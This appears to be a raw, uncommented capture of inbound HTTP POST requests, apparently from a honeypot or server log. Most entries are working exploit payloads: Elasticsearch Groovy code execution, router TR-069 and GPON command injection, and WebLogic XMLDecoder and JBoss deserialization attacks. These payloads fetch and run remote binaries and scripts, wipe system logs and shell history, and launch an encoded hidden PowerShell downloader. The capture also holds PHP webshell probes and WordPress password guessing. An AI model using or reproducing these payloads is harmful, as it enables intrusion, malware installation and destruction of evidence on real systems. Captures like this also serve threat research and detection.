post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
E/QPyNrBbBp3QvrgAZuOnhadc1Izn+ru31TLLgkc3qozNi0dkxR+Q9UibdY2K9jig6S43DzAXXYl0HtybtrzZmghDYf5gVpQ3n/IcjJdntAhP9DC52ynvIfMGX0I4lRkuLtFLzPCoi4t6lQF9q3UTP4ZrxwG48kSMT1zF0G3tb4oMMdVL51d0JFoynS3l841AMvBbzVc1C5jcq1/jNW/90XPtFqtjEgh+KYv004/WDdRFEb3ycaJ7yXO9LsXOsZmxxDg/dK8G9vy9+GoBOBrgveRJ6jTOKrlrqnxQsbUosra8uhHA2QVN26aDaFo7hFRtVh8dAIKb8eY6Lml2jxxkEUn5rHYUNqCuXZFJaoe6z2zIk/ZEOF6va8lxD7V6ZXlLQLXw73NARSHW/BD3X7jdWYmxKWZfcmXn2IWotB3pIOMvPtT
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
R6VZlIiZNpe+i4WDjFd05FDNqcGm2p1lV4B9ypQahhnKEbHIcd3QQbKXwiZcyjisZG9W6qaYuRZKewkXdrgyfhhOHYO17TALNcuAlQzUyY31QpRpaud+4iUe2Rv0oFwo/Y+owp/c3LoKMpYChmNoahTMhoLxHZbqb/fkXmgFm75vOFbq1NIeY28jSBekAYn5vt6oORI5aGNzJ/3mHkb+KZktpz2cBBr8W7LKQjKpsoHnSzKALC/8cUXQhzobJClsYuCmxpFRDn5hmE6DE7EM9h+F8jWaqHsK4Jhhqpw4r2/SENBhMRU5W7RA13uJ6aOw4UG8W1zg2Xw6WVLCaxYt0PqypSiqgtmw2cuGVzt953EaNbrS
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 530
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
AQrjzCZDVwp3sYodql7DMEk1jR13ruI78HZ4uK1CHM+USLesqh49X+mKiae4OnuUaKmzMl4xhraFgFYwuEPgvqTQvqAksaJE5Z2W4Vp5sIHU7AMe+RRPYJUvhwHRGxIb7SL9wombeYnQz9S/XR/5y3Zn1bNL3z42PN1FlMN9sd0vYeSlDsHLIezpENbr5w2htl5JO2zFDZIcdTxnSXX1GNsKxRO2eYCjRvJzGzT09Eqj4ilp3mW52YnC7LkRHe4x3ErGBhIXKWGMFl5Wdd6cnn7S97a7bBGpVPa01oeMr8nN4l1b/+dk0e4M1Puk3HosOJ/xPRKBscfyNWYYU8ZVqBHSWk90+JgCrPr7zmAKz+3yQJRWHpv8bwH0UxLKPWIm9BJORvKMYHweJwcI7u/708Dc1mI/8lWS+w0cVA==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149602540431&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue321
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue9
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://admaster.union.ucweb.com/usetting/v1/fetch_config HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: admaster.union.ucweb.com
Content-Type: application/json; charset=utf-8
Content-Length: 259
{"vno":"1495194020093","configs":[{"anchor":"0","name":"app_data"}],"app_id":"5e9abf4638d337bb55007d1fd4244486","chk":"0efb8a6c","info":{"sdk_ve":"3.0.10","pkg_ve":"10.9.0","pkg":"com.uc.browser.en","type":"1","device_hash":"af8795dc3d31775f","sdk_vc":"212"}}
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1072
Content-Type: multipart/form-data; boundary=nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
47785
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1a62aba177bcf4d483b4de94e2ead21a
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb--
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
274376
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
f1785b92f1f119e5123ff476bb564f05
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI--
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=jamesatchue&pwd=aaaa
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 33
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue99
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
SvFfld3LMAcb7s6eiGwhO95VJEm2TOGnKtnY6Sc3R6B+/rHlMsKqTXJ4u3VuVQq4HmGrPVLKOZZt8HXxG+E0k1qCf11BQITrQFHbpqACLe/14LHE9RViPGTl3Mky91WTUYH73hPD2yXVqvHZCMX9DGl9/003Qnc0yqklmSymx7WaPRqBwu5rJ1y5wrG2ON6X9SLN95KIXIonVSmLsizusdQetPRRMRRWK+IUmQtDcikVPvDxdD7PCVqzIgB63ndSkUJSjM6Nzsg2MTL84FN+8Z9L9YZwIl7RhGM+wu5zdgxjNnQhU/2Ms0O6jrp5MOw14IhC3PrjruUeQsI0TV9xwNcoPShrnPEkHR7vfq6bSlrOx/IR
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
S/Fcl9LKYA8DrdXmMonzIIz+2rxcpsS4LeIlWhtMsbG55xyC+UdTXqzJ7t8Mwg0IVCCezJzo3RnSpZwlyJkMiBtZ5uSH9kiYrWJL10yRUZgdeBOY56KfIteQbzC5BYw8ivTf6yCs8QM1XUE1T0xxUI4pPsb35USYfCvd2M3uLBj7gPhGiX5YSywDHhj2ulxzbpnMl0wba8bjuAox2CtjLq7vdsqPEhfpTRH+LjKrex1Xc6B+QxlJAxye5mgSCWrpX3wL29hEdRmLw783WzCsUwvN3XAIP0h+x3O4slB/Sl+17KLhNSsGiHTUXf4w3rKTSNh83kOrr41XBxiKWlnHlhTqrivt1enovBgPW5LaDmzoodSwGdJsuZL6XOhnTxHmWdw1KfpTtvu6xuYcfFSkrPJMWQ==
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=1722014
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
eval=die((string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149408915993&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å
⁄SÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìFY›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ÿ√ßÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
n=98134312514971&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgPMTE0LjEyNC4yMDcuMjUyHBgG5Zu95aSWGAbljbDlsLwYABgAABocGBNhcHAuY2hhdC54aWFvbWkubmV0GTwYE2FwcC5jaGF0LnhpYW9taS5uZXQVABUCFvzJARUAGwAAGA01NC4yNTUuMTg0LjE2FQIVABYAFQAbAYUWU29ja2V0VGltZW91dEV4Y2VwdGlvbgIAGA40My4yMjQuMjQ3LjE2OBUCFQAWABUAGwGFFlNvY2tldFRpbWVvdXRFeGNlcHRpb24CAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1494506028345&s=FDA6AF2A7BD99ECB9F41618756C237C1
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
POST http://check.proxyradar.com/azenv.php?auth=149415140129&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å™≈˜[Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /login.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=!@#$%^&
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[ signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxpsr java.net.URLñ%76¸‰rIhashCodeIportL authorityq~Lfileq~Lhostq~Lprotocolq~Lrefq~xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~ thttppxur[Ljava.lang.String;≠“VÁÈ{Gxpt java.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
